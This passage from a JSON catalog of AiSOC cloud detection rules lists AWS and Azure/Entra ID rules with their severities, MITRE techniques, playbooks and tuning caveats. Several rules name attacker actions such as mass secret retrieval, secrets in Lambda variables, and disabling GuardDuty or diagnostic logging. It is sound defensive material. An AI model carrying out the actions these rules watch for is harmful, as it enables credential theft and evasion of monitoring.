Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-lambda-add-permission-anonymous.yaml" }, { "id": "det-cloud-078", "type": "detection", "name": "AWS Lambda Env Var Contains Secret Pattern", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Lambda Env Var Contains Secret Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-lambda-env-var-secret-pattern.yaml" }, { "id": "det-cloud-079", "type": "detection", "name": "AWS Lambda Function URL With AuthType=NONE", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Lambda Function URL With AuthType=NONE'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-lambda-create-url-public.yaml" }, { "id": "det-cloud-080", "type": "detection", "name": "AWS Lambda Function Uses Deprecated Runtime", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Lambda Function Uses Deprecated Runtime'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "aws", "playbook": "tpl-vulnerability", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-lambda-runtime-deprecated.yaml" }, { "id": "det-cloud-081", "type": "detection", "name": "AWS EKS Cluster API Endpoint Made Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EKS Cluster API Endpoint Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-eks-cluster-public-endpoint.yaml" }, { "id": "det-cloud-082", "type": "detection", "name": "AWS EKS Fargate Profile Targets default Namespace", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EKS Fargate Profile Targets default Namespace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "aws", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-eks-fargate-profile-default-ns.yaml" }, { "id": "det-cloud-083", "type": "detection", "name": "AWS ECS Task Definition With privileged=true", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS ECS Task Definition With privileged=true'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1611" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ecs-task-privileged.yaml" }, { "id": "det-cloud-084", "type": "detection", "name": "AWS ECS ExecuteCommand Enabled On Service", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS ECS ExecuteCommand Enabled On Service'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1059" ], "log_source": "aws", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ecs-execute-command-enabled.yaml" }, { "id": "det-cloud-085", "type": "detection", "name": "AWS ECR Repository Policy Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS ECR Repository Policy Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1525" ], "log_source": "aws", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ecr-repo-publicly-readable.yaml" }, { "id": "det-cloud-086", "type": "detection", "name": "AWS ECR Image Scan-On-Push Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS ECR Image Scan-On-Push Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "aws", "playbook": "tpl-vulnerability", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ecr-image-scan-disabled.yaml" }, { "id": "det-cloud-087", "type": "detection", "name": "AWS KMS Key Policy Allows Principal '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS KMS Key Policy Allows Principal '*''.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-kms-key-policy-anonymous.yaml" }, { "id": "det-cloud-088", "type": "detection", "name": "AWS KMS ScheduleKeyDeletion Used", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS KMS ScheduleKeyDeletion Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-kms-schedule-key-deletion.yaml" }, { "id": "det-cloud-089", "type": "detection", "name": "AWS SecretsManager Mass GetSecretValue", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SecretsManager Mass GetSecretValue'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-secretsmanager-mass-getsecret.yaml" }, { "id": "det-cloud-090", "type": "detection", "name": "AWS SSM SecureString Parameter Created Without KMS", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SSM SecureString Parameter Created Without KMS'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ssm-parameter-secure-no-kms.yaml" }, { "id": "det-cloud-091", "type": "detection", "name": "AWS Config Recorder Stopped", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Config Recorder Stopped'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-config-recorder-stopped.yaml" }, { "id": "det-cloud-092", "type": "detection", "name": "AWS GuardDuty Detector Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS GuardDuty Detector Deleted'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-guardduty-detector-deleted.yaml" }, { "id": "det-cloud-093", "type": "detection", "name": "AWS SecurityHub DisableSecurityHub", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SecurityHub DisableSecurityHub'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-securityhub-disabled.yaml" }, { "id": "det-cloud-094", "type": "detection", "name": "AWS CloudTrail Event Selector Narrowed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS CloudTrail Event Selector Narrowed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-cloudtrail-event-selector-narrowed.yaml" }, { "id": "det-cloud-095", "type": "detection", "name": "AWS Organizations Account Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Organizations Account Removed'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-organizations-account-removed.yaml" }, { "id": "det-cloud-096", "type": "detection", "name": "AWS Route53 Domain Transfer Out", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Route53 Domain Transfer Out'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1583.001" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-route53-domain-transfer-out.yaml" }, { "id": "det-cloud-097", "type": "detection", "name": "AWS CloudFront Origin Changed Mid-Service", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS CloudFront Origin Changed Mid-Service'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1565.002" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-cloudfront-origin-changed.yaml" }, { "id": "det-cloud-098", "type": "detection", "name": "AWS WAF Web ACL Disassociated", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS WAF Web ACL Disassociated'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-waf-web-acl-disassociated.yaml" }, { "id": "det-cloud-099", "type": "detection", "name": "AWS SNS Topic Policy Allows Anonymous Subscribe", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SNS Topic Policy Allows Anonymous Subscribe'. A Principal of '*' only makes the topic effectively public when the statement carries no restricting Condition (for example aws:SourceArn or aws:SourceAccount); review the one documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-sns-topic-public-subscribe.yaml" }, { "id": "det-cloud-100", "type": "detection", "name": "AWS SQS Queue Policy Allows Principal '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by \"AWS SQS Queue Policy Allows Principal '*'\". A wildcard principal only makes the queue effectively public when the statement carries no restricting Condition (aws:SourceArn or aws:SourceAccount is the usual pattern for S3 or SNS event delivery to a queue); review the one documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-sqs-queue-public-policy.yaml" }, { "id": "det-cloud-101", "type": "detection", "name": "Entra ID Admin Consent Granted To App", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Admin Consent Granted To App'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1528" ], "log_source": "azure", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-app-consent-grant.yaml" }, { "id": "det-cloud-102", "type": "detection", "name": "Entra ID App Credential Added Outside Business Hours", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID App Credential Added Outside Business Hours'. Entra ID audit log timestamps are in UTC, so the business-hours window must be converted to the tenant's working time zone or the rule will fire on ordinary daytime activity. Review the one documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "azure", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-app-credential-added-out-of-hours.yaml" }, { "id": "det-cloud-103", "type": "detection", "name": "Entra ID Conditional Access Rule Excludes Privileged User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Conditional Access Rule Excludes Privileged User'. Emergency-access (break-glass) accounts are deliberately excluded from most Conditional Access policies and are the expected benign case; allow-list them explicitly rather than suppressing the rule. Review the one documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-conditional-access-bypass-rule.yaml" }, { "id": "det-cloud-104", "type": "detection", "name": "Entra ID MFA Method Removed From Privileged User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID MFA Method Removed From Privileged User'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1556.006" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-mfa-method-removed-priv.yaml" }, { "id": "det-cloud-105", "type": "detection", "name": "Entra ID PIM Role Eligibility Self-Assigned", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID PIM Role Eligibility Self-Assigned'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-pim-role-eligibility-self-assigned.yaml" }, { "id": "det-cloud-106", "type": "detection", "name": "Entra ID App Granted Directory.ReadWrite.All", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID App Granted Directory.ReadWrite.All'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1098.003" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-app-permissions-graph-read-write-all.yaml" }, { "id": "det-cloud-107", "type": "detection", "name": "Entra ID Bulk User Creation Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Bulk User Creation Burst'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1136.003" ], "log_source": "azure", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-bulk-user-creation.yaml" }, { "id": "det-cloud-108", "type": "detection", "name": "Entra ID Trusted Named Location Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Trusted Named Location Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-named-location-removed.yaml" }, { "id": "det-cloud-109", "type": "detection", "name": "Entra ID Legacy Authentication Re-Enabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Legacy Authentication Re-Enabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-legacy-auth-allowed.yaml" }, { "id": "det-cloud-110", "type": "detection", "name": "Entra ID Bulk License Assignment", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Bulk License Assignment'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "azure", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-bulk-license-assignment.yaml" }, { "id": "det-cloud-111", "type": "detection", "name": "Entra ID Admin Consent Workflow Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Admin Consent Workflow Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-admin-consent-workflow-disabled.yaml" }, { "id": "det-cloud-112", "type": "detection", "name": "Entra ID SSPR Policy Weakened", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID SSPR Policy Weakened'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-self-service-pwd-reset-policy-modified.yaml" }, { "id": "det-cloud-113", "type": "detection", "name": "Azure Policy Assignment Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Policy Assignment Deleted'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-policy-assignment-deleted.yaml" }, { "id": "det-cloud-114", "type": "detection", "name": "Azure Blueprint Assignment Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Blueprint Assignment Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-blueprint-deleted.yaml" }, { "id": "det-cloud-115", "type": "detection", "name": "Azure Role Assignment Owner At Tenant Scope", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Role Assignment Owner At Tenant Scope'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-role-assignment-owner-tenant.yaml" }, { "id": "det-cloud-116", "type": "detection", "name": "Azure ResourceGroup Locks Removed In Bulk", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure ResourceGroup Locks Removed In Bulk'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-locks-removed-bulk.yaml" }, { "id": "det-cloud-117", "type": "detection", "name": "Azure Diagnostic Settings Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Diagnostic Settings Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-diagnostic-settings-deleted.yaml" }, { "id": "det-cloud-118", "type": "detection", "name": "Azure Mass Resource Modify Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Mass Resource Modify Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-mass-resource-modify.yaml" }, { "id": "det-cloud-119", "type": "detection", "name": "Azure Management Group Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Management Group Removed'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-management-group-removed.yaml" }, { "id": "det-cloud-120", "type": "detection", "name": "Azure Subscription Transferred", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Subscription Transferred'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-subscription-transferred.yaml" }, { "id": "det-cloud-121", "type": "detection", "name": "Azure Storage Container Allows Anonymous Read", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Storage Container Allows Anonymous Read'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "azure", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-blob-anonymous-read.yaml" }, { "id": "det-cloud-122", "type": "detection", "name": "Azure Storage Account Firewall Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Storage Account Firewall Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "azure", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-account-firewall-disabled.yaml" }, { "id": "det-cloud-123", "type": "detection", "name": "Azure Storage Shared Access Signature Generated With Long TTL", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Storage Shared Access Signature Generated With Long TTL'. Caveat: a SAS signed with the account key is minted client-side and produces no control-plane event, so this signal can only be observed from storage resource logs (the expiry parameter on SAS-authenticated requests) or, for user-delegation SAS, from the user delegation key request. The rule file name (shared-key-issued) suggests the query may key on shared-key use rather than SAS issuance; verify which before relying on it. Review the one documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1078" ], "log_source": "azure", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-shared-key-issued.yaml" }, { "id": "det-cloud-124", "type": "detection", "name": "Azure Storage Immutability Policy Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Storage Immutability Policy Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-immutability-removed.yaml" }, { "id": "det-cloud-125", "type": "detection", "name": "Azure Blob Soft Delete Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Blob Soft Delete Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1490" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-soft-delete-disabled.yaml" }, { "id": "det-cloud-126", "type": "detection", "name": "Azure Key Vault Purge Protection Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Purge Protection Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-purge-protection-disabled.yaml" }, { "id": "det-cloud-127", "type": "detection", "name": "Azure Key Vault Mass GetSecret", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Mass GetSecret'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "azure", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-secret-mass-get.yaml" }, { "id": "det-cloud-128", "type": "detection", "name": "Azure Key Vault Access Policy Adds Permission '*'", "description": "AiSOC v1 curated detection. 
Triggers on the cloud signal described by \"Azure Key Vault Access Policy Adds Permission '*'\". Applies only to vaults using the legacy vault access policy permission model; vaults on the Azure RBAC permission model express permissions as role assignments and will not raise this signal, so pair it with role-assignment monitoring for full coverage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-access-policy-broadened.yaml" }, { "id": "det-cloud-129", "type": "detection", "name": "Azure Key Vault Network ACL Allows All", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Network ACL Allows All'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "azure", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-firewall-allow-all.yaml" }, { "id": "det-cloud-130", "type": "detection", "name": "Azure Key Vault Key Export Attribute Set", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Key Export Attribute Set'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552" ], "log_source": "azure", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-key-export-allowed.yaml" }, { "id": "det-cloud-131", "type": "detection", "name": "Azure AKS Cluster API With Public FQDN", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AKS Cluster API With Public FQDN'. 
